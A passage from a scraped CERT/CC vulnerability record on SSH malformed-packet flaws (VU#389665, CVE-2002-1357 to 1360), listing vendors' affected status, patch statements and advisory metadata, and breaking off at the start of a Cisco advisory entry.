feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### F-Secure __ Affected\n\nNotified: October 19, 2002 Updated: December 02, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nF-Secure SSH products are not exploitable via these attacks. While F-Secure SSH versions 3.1.0 build 11 and earlier crash on these malicious packets, we did not find ways to exploit this to gain unauthorized access or to run arbitrary code. Furthermore, the crash occurs in a forked process so the denial of service attacks are not possible.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: November 26, 2002 Updated: December 23, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSOURCE: Hewlett-Packard Company\n\nHP Tru64 UNIX V5.1a or HP OpenVMS systems using SSH V2.4.1 should upgrade to SSH V3.2. \n \nHP has investigated this report and find that our implementations within HP-UX are not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Intersoft International Inc. __ Affected\n\nNotified: November 09, 2002 Updated: January 07, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSecureNetTerm 5.4.2 addresses vulnerabilities discoverd by the Rapid7 test suite:\n\n<http://www.securenetterm.com/html/what_s_new.html> \n \n<http://www.securenetterm.com/html/downloads.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Juniper Networks __ Affected\n\nNotified: October 19, 2002 Updated: January 09, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nJuniper Networks has determined that the software on the ERX router platforms is susceptible to this vulnerability. Patches for all supported releases are now available to resolve the vulnerability. Customers should contact the Juniper Networks Technical Assistance Center to obtain the latest patch.\n\nInitial testing of the JUNOS software on Juniper's M-, T-, and J-series routers has not revealed any susceptibility to this vulnerability. Juniper will continue testing, and if any problems are found, corrective action will be taken. \n \nThe Juniper G-series Cable Modem Termination Systems are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Nortel Networks __ Affected\n\nNotified: November 27, 2002 Updated: January 20, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following Nortel Networks products are being assessed to determine whether they are potentially affected by the vulnerabilities identified in CERT Advisory CA-2002-36: Shasta Broadband Service Node and Shasta Service Creation System.\n\nPassport 8000 Series Software is potentially affected; this issue will be addressed in the next maintenance releases \n3.3.2.0, for version 3.3, scheduled for availability January 24th, 2003. \n3.2.4, for version 3.2, scheduled for availability in Mid March 2003 (target) \nReleases before 3.2.1 are not affected. \nA product bulletin will be issued shortly. \n \nSTORM is potentially affected; a product bulletin will be issued shortly and this issue will be addressed in the next Maintenance Release scheduled for availability in March, 2003. \n \nOther Nortel Networks products implementing SSH are not affected by the vulnerabilities identified in CERT Advisory CA-2002-36. \n \nFor more information please contact Nortel at: \n \nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \nContacts for other regions are available at <<http://www.nortelnetworks.com/help/contact/global/>>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Pragma Systems __ Affected\n\nNotified: November 13, 2002 Updated: December 02, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nDecember 16, 2002\n\nRapid 7 and CERT Coordination Center Vulnerability report VU#389665 \n \nPragma Systems Inc. of Austin, Texas, USA, was notified regarding a possible vulnerability with Version 2.0 of Pragma SecureShell. Pragma Systems tested Pragma SecureShell 2.0 and the upcoming new Version 3.0, and found that the attacks did cause a memory access protection fault on Microsoft platforms. \n \nAfter research, Pragma Systems corrected the problem. The correction of the problem leads us to believe that any attack would not cause a Denial of Service, or the ability of random code to run on the server. \n \nThe problem is corrected in Pragma SecureShell Version 3.0. Any customers with concerns regarding this vulnerability report should contact Pragma Systems, Inc at [support@pragmasys.com](<mailto:support@pragmasys.com>) for information on obtaining an upgrade free of charge. Pragma's web site is located at [www.pragmasys.com](<http://www.pragmasys.com/>) and the company can be reached at 1-512-219-7270.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### PuTTY __ Affected\n\nNotified: November 06, 2002 Updated: January 20, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPuTTY versions 0.53 and earlier are vulnerable to a buffer overrun discovered by SSHredder. Version 0.53b fixes this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n[PuTTY](<http://www.chiark.greenend.org.uk/~sgtatham/putty/>) acknowledged the existence of this vulnerability on 2002-11-07. See also:\n\n<http://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Riverstone Networks __ Affected\n\nNotified: December 23, 2002 Updated: January 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nRiverstone's implemention of SSH is based on OpenSSH, which is not vulnerable to any of the particular tests that are run by the SSHredder test suite. However, while running the test suite under certain conditions the router can experience a problem causing it to reload.\n\nFor more details, please see <http://www.riverstonenet.com/support/support_security.shtml> and the security advisory at <http://www.riverstonenet.com/support/tb0239-9.shtml>.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### SSH Communications Security __ Affected\n\nNotified: October 19, 2002 Updated: December 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWith SSH Secure Shell the worst case effect of the vulnerability is a denial of service (DoS) for a single child-server (connection). This cannot be exploited to gain access to the host and this does not affect the parent server in any wa nor does it hinder the server's ability to receive new connections - it only affects the child server that is handling connections to the malicious client, or a client application that is connecting to a malicious server. No arbitrary code can be executed.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe SSH Communications Security implementation of the SSH transport layer protocol appears to be vulnerable to a null-pointer dereference, which can cause a client or child server process to crash. Existing connections and the ability to make new connections to the server are not affected. The client application terminates. The impact of this vulnerability seems to be limited to denial of service.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### WinSCP __ Affected\n\nNotified: December 17, 2002 Updated: January 20, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nBased on information from Rapid7 and Martin Prikryl, WinSCP 2.0 beta build 110 is vulnerable.\n\nWinSCP appears to be based on PuTTY, and WinSCP 2.1 beta build 119 addresses a vulnerability discovered with SSHredder: \n \n<http://winscp.vse.cz/eng/history.php#2.1.0.119>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### AppGate Network Security AB __ Not Affected\n\nUpdated: May 05, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nAppGate builds on OpenSSH and is not vulnerable to this.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Apple Computer Inc. __ Not Affected\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nApple: Mac OS X and Mac OS X Server do not contain the vulnerabilities described in this report.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Cray Inc. __ Not Affected\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCray Inc. supports the OpenSSH product through their Cray Open Software (COS) package. COS 3.3, available the end of December 2002, is not vulnerable. If a site is concerned, they can contact their local Cray representive to obtain an early copy of the OpenSSH contained in COS 3.3.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nAccording to information on the CrayDoc web site, Cray Open Software 3.2 includes OpenSSH 3.4p1:\n\n<http://www.cray.com/craydoc/manuals/S-2350-32/html-S-2350-32/zfixedegeqfbpi.html#Z1014921192FXB> \n \nFor information about OpenSSH please see the OpenSSH vendor record.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Fujitsu __ Not Affected\n\nNotified: November 27, 2002 Updated: December 02, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFujitsu's UXP/V OS is not vulnerable because it does not support SSH.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### IBM __ Not Affected\n\nNotified: November 27, 2002 Updated: December 16, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIBM's AIX is not vulnerable to the issues discussed in CERT Vulnerability Note VU#389665.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### MacSSH __ Not Affected\n\nNotified: December 09, 2002 Updated: December 17, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nI finally managed to find some time to run the test suite, and found no problem in MacSSH version 2.1fc3 (the last release available).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n[MacSSH](<http://www.macssh.com/>) is based in part on [lsh](<http://www.lysator.liu.se/~nisse/lsh/>), which is also not vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### NetScreen __ Not Affected\n\nNotified: December 09, 2002 Updated: December 16, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nTested latest versions. Not Vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### OpenSSH __ Not Affected\n\nNotified: October 19, 2002 Updated: December 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFrom my testing it seems that the current version of OpenSSH (3.5) is not vulnerable to these problems, and some limited testing shows that no version of OpenSSH is vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### VanDyke Software Inc. __ Not Affected\n\nNotified: November 27, 2002 Updated: December 18, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFrom our testing it seems that the current versions of VanDyke's Secure Shell implementations are not vulnerable to these problems, and some limited testing shows that no prior VanDyke Secure Shell implementations are vulnerable.\n\nOfficial Releases Tested: \n \nServer:\n\n> VShell 2.1.1 October 15, 2002\n\nClients:\n\n> SecureCRT 4.0.2 December 3, 2002 \nSecureFX 2.1.1 November 7, 2002 \nEntunnel 1.0.1 October 15, 2002\n\nOlder Releases Tested: \n \nServers:\n\n> VShell 2.0.3 May 28, 2002 \nVShell 1.2.4 May 28, 2002\n\nClients:\n\n> SecureCRT 3.4.7 November 7, 2002\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Xerox Corporation __ Not Affected\n\nUpdated: February 25, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nA response to this advisory is available from our web site:\n\n[http://www.xerox.com/security](<http://www.xerox.com/security/>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### cryptlib __ Not Affected\n\nUpdated: March 11, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFrom testing against the SSHredder data the invalid packets are being caught and rejected by cryptlib's packet validity-checking code, making it not vulnerable to the problem.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe cryptlib SSH implementation is reported to be not vulnerable:\n\n<http://www.cs.auckland.ac.nz/~pgut001/cryptlib/index.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### lsh __ Not Affected\n\nNotified: December 09, 2002 Updated: December 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nI've now tried the testsuite with the latest stable release of lsh, lsh-1.4.2. Both the client and the server seem NOT VULNERABLE.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### 3Com Unknown\n\nUpdated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Avaya Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Bitvise Unknown\n\nNotified: December 06, 2002 Updated: December 13, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: December 06, 2002 Updated: March 20, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Data General Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Foundry Networks Inc. Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### FreeBSD Unknown\n\nNotified: December 06, 2002 Updated: March 20, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Intel Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Interpeak Unknown\n\nNotified: December 17, 2002 Updated: March 11, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Massachusetts Institute of Technology (MIT) Unknown\n\nNotified: December 09, 2002 Updated: December 17, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 27, 2002 Updated: November 26, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### NetBSD Unknown\n\nNotified: December 06, 2002 Updated: March 20, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Netcomposite Unknown\n\nNotified: November 25, 2002 Updated: March 11, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 11, 2002 Updated: December 03, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Red Hat Inc. Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Redback Networks Inc. Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### SGI Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Sun Microsystems Inc. __ Unknown\n\nNotified: November 25, 2002 Updated: February 17, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nThe version of Secure Shell (SSH) shipped with Solaris 9 is not affected by the issues described in CERT VU#389665.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### TTSSH/TeraTerm Unknown\n\nNotified: December 09, 2002 Updated: December 17, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### The SCO Group Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### The SCO Group Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Unisys Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\nView all 50 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.rapid7.com/advisories/R7-0009.txt>\n * <http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666>\n * <http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15.txt>\n * <http://www.ietf.org/internet-drafts/draft-ietf-secsh-architecture-13.txt>\n * <http://www.citi.umich.edu/u/provos/ssh/privsep.html>\n\n### Acknowledgements\n\nThe CERT/CC thanks Rapid7 for researching and reporting these vulnerabilities. \n\nThis document was written by Art Manion and Shawn V. Hernan.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1357](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1357>) \n---|--- \n**CERT Advisory:** | [CA-2002-36 ](<http://www.cert.org/advisories/CA-2002-36.html>) \n**Severity Metric:** | 11.04 \n**Date Public:** | 2002-12-16 \n**Date First Published:** | 2002-12-16 \n**Date Last Updated: ** | 2003-06-18 17:15 UTC \n**Document Revision: ** | 39 \n", "cvss3": {}, "published": "2002-12-16T00:00:00", "type": "cert", "title": "Multiple vendors' SSH transport layer protocol implementations contain vulnerabilities in key exchange and initialization", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2003-06-18T17:15:00", "id": "VU:389665", "href": "https://www.kb.cert.org/vuls/id/389665", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-06-05T10:07:01", "description": "", "cvss3": {}, "published": "2002-12-19T23:00:00", "type": "cisco", "title": "SSH Malformed Packet Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2002-12-19T23:00:00", "id": "CISCO-SA-20021219-SSH-PACKET", "href": 